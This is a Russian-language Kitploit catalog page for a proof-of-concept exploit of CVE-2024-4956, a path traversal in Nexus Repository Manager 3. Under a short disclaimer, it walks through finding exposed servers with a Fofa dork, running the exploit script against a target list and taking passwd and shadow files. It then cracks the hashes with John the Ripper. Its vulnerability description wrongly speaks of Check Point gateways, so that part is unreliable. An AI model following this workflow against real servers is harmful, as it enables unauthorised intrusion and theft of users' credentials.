Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - неавторизованный обход пути в Nexus Repository Manager 3 | Kitploit
Инструменты/GitHubGitHub/verylazytech/cve-2024-4956
Взлом паролейРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - неавторизованный обход пути в Nexus Repository Manager 3

Репозиторий
1641 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Nexus Repository Manager 3 Неавторизованный обход пути

Потенциально позволяет злоумышленнику читать определенную информацию на шлюзах безопасности Check Point после подключения к Интернету и включения Remote Access VPN или Mobile Access Software Blades. Доступно исправление безопасности, устраняющее эту уязвимость.

Читать о нем — CVE-2024-4956

Отказ от ответственности: Данное доказательство концепции (POC) предназначено только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчики не несут никакой ответственности за любое неправильное использование или ущерб, причиненный этой программой.

Начало работы

Поиск целей

Чтобы найти потенциальные цели, используйте Fofa (аналогично Shodan.io):

  • Fofa Dork: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

Сначала клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

Затем выберите цель и добавьте ее в файл list.txt в этом формате:

  • https://ip_address

Запустите эксплойт:

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

Результат — найденные файлы passwd и shadow:

Alt text

Теперь, после того как вы нашли оба файла passwd и shadow, вы можете попробовать взломать хэш с помощью JohnTheRipper. После запуска эксплойта у вас есть 2 файла: passwd и shadow, поэтому вы можете объединить их в один файл и попробовать взломать (я использовал rockyou.txt, но это может быть любой список паролей):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Скачать инструмент